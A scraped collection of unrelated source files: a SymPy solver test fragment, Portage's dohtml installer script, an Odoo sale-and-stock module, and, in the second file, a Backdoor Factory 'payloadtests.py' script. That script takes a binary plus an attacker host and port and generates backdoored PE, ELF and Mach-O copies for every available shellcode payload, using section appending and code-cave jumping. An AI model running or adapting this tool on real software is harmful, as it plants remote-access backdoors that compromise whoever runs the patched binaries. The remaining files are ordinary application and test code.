(c + 1)*b*x + (c + 1)*2*c*x + (c + 1)**2)/(c + 1), [a, b, c], x) == \
{a: -2, b: 2, c: -1}
def test_solve_inequalities():
system = [Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]
assert solve(system) == \
And(Or(And(Lt(-sqrt(2), re(x)), Lt(re(x), -1)),
And(Lt(1, re(x)), Lt(re(x), sqrt(2)))), Eq(im(x), 0))
assert solve(system, assume=Assume(x, Q.real)) == \
Or(And(Lt(-sqrt(2), x), Lt(x, -1)), And(Lt(1, x), Lt(x, sqrt(2))))
|
pernici/sympy
|
sympy/solvers/tests/test_solvers.py
|
Python
|
bsd-3-clause
| 13,913 | 0.016172 |
#!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
        print 'Only support ELF, PE, and MACH-O file formats'
return None
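# Hedged usage sketch (paths are hypothetical, not part of the original tool):
# basicDiscovery() classifies a target from its first four bytes alone, so no
# full parse of the binary is required.
#
# >>> basicDiscovery('/bin/ls')   # ELF magic '\x7fELF' contains 'ELF'
# 'ELF'
# >>> basicDiscovery('calc.exe')  # PE/COFF files begin with the 'MZ' stub
# 'PE'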
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
    Each payload has its own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
|
shadghost/Auto-Backdoor
|
the-backdoor-factory/payloadtests.py
|
Python
|
gpl-3.0
| 6,022 | 0.001993 |
#!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import shutil
import sys
from portage.util import normalize_path
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
try:
os.makedirs(path, 0o755)
except OSError:
if not os.path.isdir(path):
raise
os.chmod(path, 0o755)
def dofile(src,dst):
shutil.copy(src, dst)
os.chmod(dst, 0o644)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
fullpath = basename
if prefix:
fullpath = os.path.join(prefix, fullpath)
if dirname:
fullpath = os.path.join(dirname, fullpath)
if options.DOCDESTTREE:
desttree = options.DOCDESTTREE
else:
desttree = "html"
destdir = os.path.join(options.ED, "usr", "share", "doc",
options.PF.lstrip(os.sep), desttree.lstrip(os.sep),
options.doc_prefix.lstrip(os.sep), prefix).rstrip(os.sep)
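	# e.g. (hypothetical values) with ED=/var/tmp/image, PF=foo-1.0,
	# desttree=html and empty doc_prefix/prefix, this resolves to:
	#   /var/tmp/image/usr/share/doc/foo-1.0/html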
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, os.path.join(destdir, basename))
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix:
pfx = os.path.join(prefix, pfx)
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if self.PF:
self.PF = normalize_path(self.PF)
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if self.ED:
self.ED = normalize_path(self.ED)
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
if self.DOCDESTTREE:
self.DOCDESTTREE = normalize_path(self.DOCDESTTREE)
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
if options.doc_prefix:
options.doc_prefix = normalize_path(options.doc_prefix)
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = values
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
endswith_slash = (os.sep, os.sep + ".")
for x in args:
trailing_slash = x.endswith(endswith_slash)
x = normalize_path(x)
if trailing_slash:
# Modify behavior of basename and dirname
# as noted in bug #425214, causing foo/ to
# behave similarly to the way that foo/*
# behaves.
x += os.sep
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
|
prometheanfire/portage
|
bin/dohtml.py
|
Python
|
gpl-2.0
| 6,987 | 0.025619 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_order(osv.osv):
_inherit = "sale.order"
def _get_default_warehouse(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def _get_shipped(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
group = sale.procurement_group_id
if group:
res[sale.id] = all([proc.state in ['cancel', 'done'] for proc in group.procurement_ids])
else:
res[sale.id] = False
return res
def _get_orders(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.procurement_id and move.procurement_id.sale_line_id:
res.add(move.procurement_id.sale_line_id.order_id.id)
return list(res)
def _get_orders_procurements(self, cr, uid, ids, context=None):
res = set()
for proc in self.pool.get('procurement.order').browse(cr, uid, ids, context=context):
if proc.state =='done' and proc.sale_line_id:
res.add(proc.sale_line_id.order_id.id)
return list(res)
def _get_picking_ids(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
if not sale.procurement_group_id:
res[sale.id] = []
continue
res[sale.id] = self.pool.get('stock.picking').search(cr, uid, [('group_id', '=', sale.procurement_group_id.id)], context=context)
return res
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
vals = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, group_id=group_id, context=context)
location_id = order.partner_shipping_id.property_stock_customer.id
vals['location_id'] = location_id
routes = line.route_id and [(4, line.route_id.id)] or []
vals['route_ids'] = routes
vals['warehouse_id'] = order.warehouse_id and order.warehouse_id.id or False
vals['partner_dest_id'] = order.partner_shipping_id.id
return vals
_columns = {
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'shipped': fields.function(_get_shipped, string='Delivered', type='boolean', store={
'procurement.order': (_get_orders_procurements, ['state'], 10)
}),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
'picking_ids': fields.function(_get_picking_ids, method=True, type='one2many', relation='stock.picking', string='Picking associated to this sale'),
}
_defaults = {
'warehouse_id': _get_default_warehouse,
'picking_policy': 'direct',
'order_policy': 'manual',
}
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
val = {}
if warehouse_id:
warehouse = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
if warehouse.company_id:
val['company_id'] = warehouse.company_id.id
return {'value': val}
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing delivery orders
of given sales order ids. It can either be a in a list or in a form
view, if there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree_all')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',[" + ','.join(map(str, pick_ids)) + "])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
move_obj = self.pool.get("stock.move")
res = super(sale_order,self).action_invoice_create(cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
for picking in order.picking_ids:
move_obj.write(cr, uid, [x.id for x in picking.move_lines], {'invoice_state': 'invoiced'}, context=context)
return res
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.write(cr, uid, [o.id], {'order_policy': 'manual'}, context=context)
return res
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
date_planned = super(sale_order, self)._get_date_planned(cr, uid, order, line, start_date, context=context)
date_planned = (date_planned - timedelta(days=order.company_id.security_lead)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return date_planned
def _prepare_procurement_group(self, cr, uid, order, context=None):
        res = super(sale_order, self)._prepare_procurement_group(cr, uid, order, context=context)
res.update({'move_type': order.picking_policy})
return res
def action_ship_end(self, cr, uid, ids, context=None):
super(sale_order, self).action_ship_end(cr, uid, ids, context=context)
for order in self.browse(cr, uid, ids, context=context):
val = {'shipped': True}
if order.state == 'shipping_except':
val['state'] = 'progress'
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
res = self.write(cr, uid, [order.id], val)
return True
def has_stockable_products(self, cr, uid, ids, *args):
for order in self.browse(cr, uid, ids):
for order_line in order.order_line:
if order_line.product_id and order_line.product_id.type in ('product', 'consu'):
return True
return False
class product_product(osv.osv):
_inherit = 'product.product'
def need_procurement(self, cr, uid, ids, context=None):
#when sale/product is installed alone, there is no need to create procurements, but with sale_stock
#we must create a procurement for each product that is not a service.
for product in self.browse(cr, uid, ids, context=context):
if product.type != 'service':
return True
return super(product_product, self).need_procurement(cr, uid, ids, context=context)
class sale_order_line(osv.osv):
_inherit = 'sale.order.line'
def _number_packages(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
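            # Hedged note: this computes ceil(product_uom_qty / packaging qty)
            # with a small epsilon so an exact multiple does not round up one
            # extra package; the bare except falls back to a single package
            # (e.g. when no packaging is set and its qty is zero/False).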
try:
res[line.id] = int((line.product_uom_qty+line.product_packaging.qty-0.0001) / line.product_packaging.qty)
except:
res[line.id] = 1
return res
_columns = {
'product_packaging': fields.many2one('product.packaging', 'Packaging'),
'number_packages': fields.function(_number_packages, type='integer', string='Number Packages'),
'route_id': fields.many2one('stock.location.route', 'Route', domain=[('sale_selectable', '=', True)]),
'product_tmpl_id': fields.related('product_id', 'product_tmpl_id', type='many2one', relation='product.template', string='Product Template'),
}
_defaults = {
'product_packaging': False,
}
def product_packaging_change(self, cr, uid, ids, pricelist, product, qty=0, uom=False,
partner_id=False, packaging=False, flag=False, context=None):
if not product:
return {'value': {'product_packaging': False}}
product_obj = self.pool.get('product.product')
product_uom_obj = self.pool.get('product.uom')
pack_obj = self.pool.get('product.packaging')
warning = {}
result = {}
warning_msgs = ''
if flag:
res = self.product_id_change(cr, uid, ids, pricelist=pricelist,
product=product, qty=qty, uom=uom, partner_id=partner_id,
packaging=packaging, flag=False, context=context)
warning_msgs = res.get('warning') and res['warning'].get('message', '') or ''
products = product_obj.browse(cr, uid, product, context=context)
if not products.packaging_ids:
packaging = result['product_packaging'] = False
if packaging:
default_uom = products.uom_id and products.uom_id.id
pack = pack_obj.browse(cr, uid, packaging, context=context)
q = product_uom_obj._compute_qty(cr, uid, uom, pack.qty, default_uom)
# qty = qty - qty % q + q
            if qty and q and qty % q != 0:
ean = pack.ean or _('(n/a)')
qty_pack = pack.qty
type_ul = pack.ul
if not warning_msgs:
warn_msg = _("You selected a quantity of %d Units.\n"
"But it's not compatible with the selected packaging.\n"
"Here is a proposition of quantities according to the packaging:\n"
"EAN: %s Quantity: %s Type of ul: %s") % \
(qty, ean, qty_pack, type_ul.name)
warning_msgs += _("Picking Information ! : ") + warn_msg + "\n\n"
warning = {
'title': _('Configuration Error!'),
'message': warning_msgs
}
result['product_uom_qty'] = qty
return {'value': result, 'warning': warning}
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
context = context or {}
product_uom_obj = self.pool.get('product.uom')
product_obj = self.pool.get('product.product')
warehouse_obj = self.pool['stock.warehouse']
warning = {}
#UoM False due to hack which makes sure uom changes price, ... in product_id_change
res = self.product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=False, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not product:
res['value'].update({'product_packaging': False})
return res
# set product uom in context to get virtual stock in current uom
if 'product_uom' in res.get('value', {}):
# use the uom changed by super call
context = dict(context, uom=res['value']['product_uom'])
elif uom:
# fallback on selected
context = dict(context, uom=uom)
#update of result obtained in super function
product_obj = product_obj.browse(cr, uid, product, context=context)
res['value'].update({'product_tmpl_id': product_obj.product_tmpl_id.id, 'delay': (product_obj.sale_delay or 0.0)})
# Calling product_packaging_change function after updating UoM
res_packing = self.product_packaging_change(cr, uid, ids, pricelist, product, qty, uom, partner_id, packaging, context=context)
res['value'].update(res_packing.get('value', {}))
warning_msgs = res_packing.get('warning') and res_packing['warning']['message'] or ''
if product_obj.type == 'product':
#determine if the product is MTO or not (for a further check)
isMto = False
if warehouse_id:
warehouse = warehouse_obj.browse(cr, uid, warehouse_id, context=context)
for product_route in product_obj.route_ids:
if warehouse.mto_pull_id and warehouse.mto_pull_id.route_id and warehouse.mto_pull_id.route_id.id == product_route.id:
isMto = True
break
else:
try:
mto_route_id = warehouse_obj._get_mto_route(cr, uid, context=context)
except:
# if route MTO not found in ir_model_data, we treat the product as in MTS
mto_route_id = False
if mto_route_id:
for product_route in product_obj.route_ids:
if product_route.id == mto_route_id:
isMto = True
break
#check if product is available, and if not: raise a warning, but do this only for products that aren't processed in MTO
if not isMto:
uom_record = False
if uom:
uom_record = product_uom_obj.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom_record.category_id.id:
uom_record = False
if not uom_record:
uom_record = product_obj.uom_id
compare_qty = float_compare(product_obj.virtual_available, qty, precision_rounding=uom_record.rounding)
if compare_qty == -1:
warn_msg = _('You plan to sell %.2f %s but you only have %.2f %s available !\nThe real stock is %.2f %s. (without reservations)') % \
(qty, uom_record.name,
max(0,product_obj.virtual_available), uom_record.name,
max(0,product_obj.qty_available), uom_record.name)
warning_msgs += _("Not enough stock ! : ") + warn_msg + "\n\n"
#update of warning messages
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
res.update({'warning': warning})
return res
class stock_move(osv.osv):
_inherit = 'stock.move'
def _create_invoice_line_from_vals(self, cr, uid, move, invoice_line_vals, context=None):
invoice_line_id = super(stock_move, self)._create_invoice_line_from_vals(cr, uid, move, invoice_line_vals, context=context)
if move.procurement_id and move.procurement_id.sale_line_id:
sale_line = move.procurement_id.sale_line_id
self.pool.get('sale.order.line').write(cr, uid, [sale_line.id], {
'invoice_lines': [(4, invoice_line_id)]
}, context=context)
self.pool.get('sale.order').write(cr, uid, [sale_line.order_id.id], {
'invoice_ids': [(4, invoice_line_vals['invoice_id'])],
})
sale_line_obj = self.pool.get('sale.order.line')
invoice_line_obj = self.pool.get('account.invoice.line')
sale_line_ids = sale_line_obj.search(cr, uid, [('order_id', '=', move.procurement_id.sale_line_id.order_id.id), ('invoiced', '=', False), '|', ('product_id', '=', False), ('product_id.type', '=', 'service')], context=context)
if sale_line_ids:
created_lines = sale_line_obj.invoice_line_create(cr, uid, sale_line_ids, context=context)
invoice_line_obj.write(cr, uid, created_lines, {'invoice_id': invoice_line_vals['invoice_id']}, context=context)
return invoice_line_id
def _get_master_data(self, cr, uid, move, company, context=None):
if move.procurement_id and move.procurement_id.sale_line_id and move.procurement_id.sale_line_id.order_id.order_policy == 'picking':
sale_order = move.procurement_id.sale_line_id.order_id
return sale_order.partner_invoice_id, sale_order.user_id.id, sale_order.pricelist_id.currency_id.id
elif move.picking_id.sale_id and context.get('inv_type') == 'out_invoice':
# In case of extra move, it is better to use the same data as the original moves
sale_order = move.picking_id.sale_id
return sale_order.partner_invoice_id, sale_order.user_id.id, sale_order.pricelist_id.currency_id.id
return super(stock_move, self)._get_master_data(cr, uid, move, company, context=context)
def _get_invoice_line_vals(self, cr, uid, move, partner, inv_type, context=None):
res = super(stock_move, self)._get_invoice_line_vals(cr, uid, move, partner, inv_type, context=context)
if move.procurement_id and move.procurement_id.sale_line_id:
sale_line = move.procurement_id.sale_line_id
res['invoice_line_tax_id'] = [(6, 0, [x.id for x in sale_line.tax_id])]
res['account_analytic_id'] = sale_line.order_id.project_id and sale_line.order_id.project_id.id or False
res['discount'] = sale_line.discount
if move.product_id.id != sale_line.product_id.id:
res['price_unit'] = self.pool['product.pricelist'].price_get(
cr, uid, [sale_line.order_id.pricelist_id.id],
move.product_id.id, move.product_uom_qty or 1.0,
sale_line.order_id.partner_id, context=context)[sale_line.order_id.pricelist_id.id]
else:
res['price_unit'] = sale_line.price_unit
uos_coeff = move.product_uom_qty and move.product_uos_qty / move.product_uom_qty or 1.0
res['price_unit'] = res['price_unit'] / uos_coeff
return res
def _get_moves_taxes(self, cr, uid, moves, context=None):
is_extra_move, extra_move_tax = super(stock_move, self)._get_moves_taxes(cr, uid, moves, context=context)
for move in moves:
if move.procurement_id and move.procurement_id.sale_line_id:
is_extra_move[move.id] = False
extra_move_tax[move.picking_id, move.product_id] = [(6, 0, [x.id for x in move.procurement_id.sale_line_id.tax_id])]
return (is_extra_move, extra_move_tax)
class stock_location_route(osv.osv):
_inherit = "stock.location.route"
_columns = {
'sale_selectable': fields.boolean("Selectable on Sales Order Line")
}
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_partner_to_invoice(self, cr, uid, picking, context=None):
""" Inherit the original function of the 'stock' module
We select the partner of the sales order as the partner of the customer invoice
"""
saleorder_ids = self.pool['sale.order'].search(cr, uid, [('procurement_group_id' ,'=', picking.group_id.id)], context=context)
saleorders = self.pool['sale.order'].browse(cr, uid, saleorder_ids, context=context)
if saleorders and saleorders[0] and saleorders[0].order_policy == 'picking':
saleorder = saleorders[0]
return saleorder.partner_invoice_id.id
return super(stock_picking, self)._get_partner_to_invoice(cr, uid, picking, context=context)
def _get_sale_id(self, cr, uid, ids, name, args, context=None):
sale_obj = self.pool.get("sale.order")
res = {}
for picking in self.browse(cr, uid, ids, context=context):
res[picking.id] = False
if picking.group_id:
sale_ids = sale_obj.search(cr, uid, [('procurement_group_id', '=', picking.group_id.id)], context=context)
if sale_ids:
res[picking.id] = sale_ids[0]
return res
_columns = {
'sale_id': fields.function(_get_sale_id, type="many2one", relation="sale.order", string="Sale Order"),
}
def _create_invoice_from_picking(self, cr, uid, picking, vals, context=None):
invoice_id = super(stock_picking, self)._create_invoice_from_picking(cr, uid, picking, vals, context=context)
return invoice_id
def _get_invoice_vals(self, cr, uid, key, inv_type, journal_id, move, context=None):
inv_vals = super(stock_picking, self)._get_invoice_vals(cr, uid, key, inv_type, journal_id, move, context=context)
sale = move.picking_id.sale_id
if sale:
inv_vals.update({
'fiscal_position': sale.fiscal_position.id,
'payment_term': sale.payment_term.id,
'user_id': sale.user_id.id,
'section_id': sale.section_id.id,
'name': sale.client_order_ref or '',
})
return inv_vals
|
Jgarcia-IAS/Fidelizacion_odoo
|
openerp/addons/sale_stock/sale_stock.py
|
Python
|
agpl-3.0
| 24,595 | 0.005733 |
from celery.task import task
import time
@task
def sleep(duration=10):
time.sleep(duration)
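# Hedged usage sketch (assumes a configured Celery broker and a running
# worker): .delay() enqueues the task instead of blocking the caller.
#     sleep.delay(30)  # returns an AsyncResult immediately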
|
gmimano/commcaretest
|
corehq/apps/hqadmin/tasks.py
|
Python
|
bsd-3-clause
| 98 | 0.020408 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
